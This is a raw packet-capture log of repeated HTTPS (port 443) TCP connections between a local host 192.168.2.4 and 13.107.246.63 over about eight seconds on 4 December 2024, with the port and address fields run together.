                                                                                                                                                                                  Dec 4, 2024 11:10:59.508141041 CET4434987513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.511042118 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.511060953 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:59.511123896 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.511339903 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:59.511354923 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.118257046 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.122644901 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.122667074 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.123074055 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.123079062 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.544393063 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.544919014 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.544948101 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.545434952 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.545444965 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.564234018 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.568253994 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.568296909 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.568306923 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.568393946 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.568593979 CET49876443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.568610907 CET4434987613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.571434021 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.571486950 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.571552992 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.571713924 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.571727991 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.671909094 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.672719955 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.672739029 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.673441887 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.673446894 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.817369938 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.818325996 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.818366051 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.818880081 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.818887949 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.979895115 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.983154058 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.983268023 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.983268023 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.983331919 CET49877443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.983345985 CET4434987713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.985874891 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.985924959 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:00.986062050 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.986234903 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:00.986248016 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.107088089 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.111103058 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.111155033 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.111228943 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.111284971 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.111293077 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.111320972 CET49878443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.111325026 CET4434987813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.114255905 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.114303112 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.114373922 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.114521980 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.114533901 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.227102041 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.232523918 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.232547998 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.232984066 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.232989073 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.252077103 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.255673885 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.256127119 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.256311893 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.256333113 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.256345987 CET49879443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.256352901 CET4434987913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.258976936 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.259025097 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.260114908 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.260251999 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.260263920 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.661649942 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.661730051 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.661832094 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.661994934 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.662017107 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.662034035 CET49880443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.662039042 CET4434988013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.664702892 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.664746046 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:01.668123007 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.668283939 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:01.668294907 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.287549973 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.374062061 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.394428015 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.394447088 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.398323059 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.398335934 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.702545881 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.711448908 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.711476088 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.717578888 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.717587948 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.722601891 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.725780964 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.725836992 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.735300064 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.735340118 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.735357046 CET49881443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.735363007 CET4434988113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.813009977 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.813049078 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.813108921 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.813755035 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.813772917 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.833748102 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.849318027 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.849354029 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.853805065 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.853813887 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.976098061 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.983000994 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.983016968 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:02.984136105 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:02.984141111 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.140609026 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143625975 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143671036 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143682957 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143728971 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143821001 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143841028 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143851995 CET49882443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.143857002 CET4434988213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.146768093 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.146800041 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.146856070 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.147104979 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.147120953 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.268520117 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.272732973 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.276196003 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.294492006 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.294528961 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.294545889 CET49883443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.294552088 CET4434988313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.297663927 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.297718048 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.300134897 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.300304890 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.300318003 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.386650085 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.388582945 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.388590097 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.389031887 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.389034986 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.830625057 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.832515955 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.832719088 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.832767963 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.832784891 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.832794905 CET49885443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.832801104 CET4434988513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.835283995 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.835324049 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:03.835391045 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.835561991 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:03.835577965 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:04.598731995 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:04.599282026 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:04.599323988 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:04.599725008 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:04.599730968 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:04.864969015 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:04.865596056 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:04.865634918 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:04.866070032 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:04.866076946 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.016720057 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.019435883 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.019463062 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.020015955 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.020020962 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.042140007 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.046525002 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.046598911 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.047924995 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.047944069 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.047956944 CET49886443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.047962904 CET4434988613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.051212072 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.051239967 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.051296949 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.051443100 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.051455975 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.299397945 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.302635908 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.304229021 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.304229021 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.307019949 CET49887443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.307018995 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.307039022 CET4434988713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.307075024 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.307146072 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.307338953 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.307348967 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.452011108 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.455115080 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.455188990 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.455230951 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.455250025 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.455260992 CET49888443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.455266953 CET4434988813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.459156036 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.459194899 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.459275007 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.459456921 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.459471941 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.616672993 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.617466927 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.617477894 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.617980957 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.617985964 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.738296986 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.741893053 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.741934061 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.742007017 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.742043972 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.742057085 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.742068052 CET49884443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.742073059 CET4434988413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.744729042 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.744771957 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:05.744832039 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.745008945 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:05.745024920 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.061086893 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.064603090 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.064657927 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.064759016 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.064779997 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.064809084 CET49889443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.064824104 CET4434988913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.067498922 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.067539930 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.067616940 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.067774057 CET49894443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.067789078 CET4434989413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.632426977 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.632957935 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.632994890 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:06.633460999 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:06.633466005 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.080671072 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.084048986 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.086261034 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.086317062 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.086338043 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.086350918 CET49890443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.086357117 CET4434989013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.088371992 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.089142084 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.089195967 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.089489937 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.089504957 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.089523077 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.089687109 CET49895443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.089698076 CET4434989513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.090002060 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.090008020 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.180542946 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.182591915 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.182625055 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.183052063 CET49892443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.183058023 CET4434989213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.526849985 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.530570030 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.530591011 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.531018972 CET49893443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.531029940 CET4434989313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.531922102 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.535599947 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.538244009 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.538289070 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.538311005 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.538321972 CET49891443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.538327932 CET4434989113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.540659904 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.540707111 CET4434989613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:11:07.540776014 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.540941954 CET49896443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:11:07.540956974 CET4434989613.107.246.63192.168.2.4
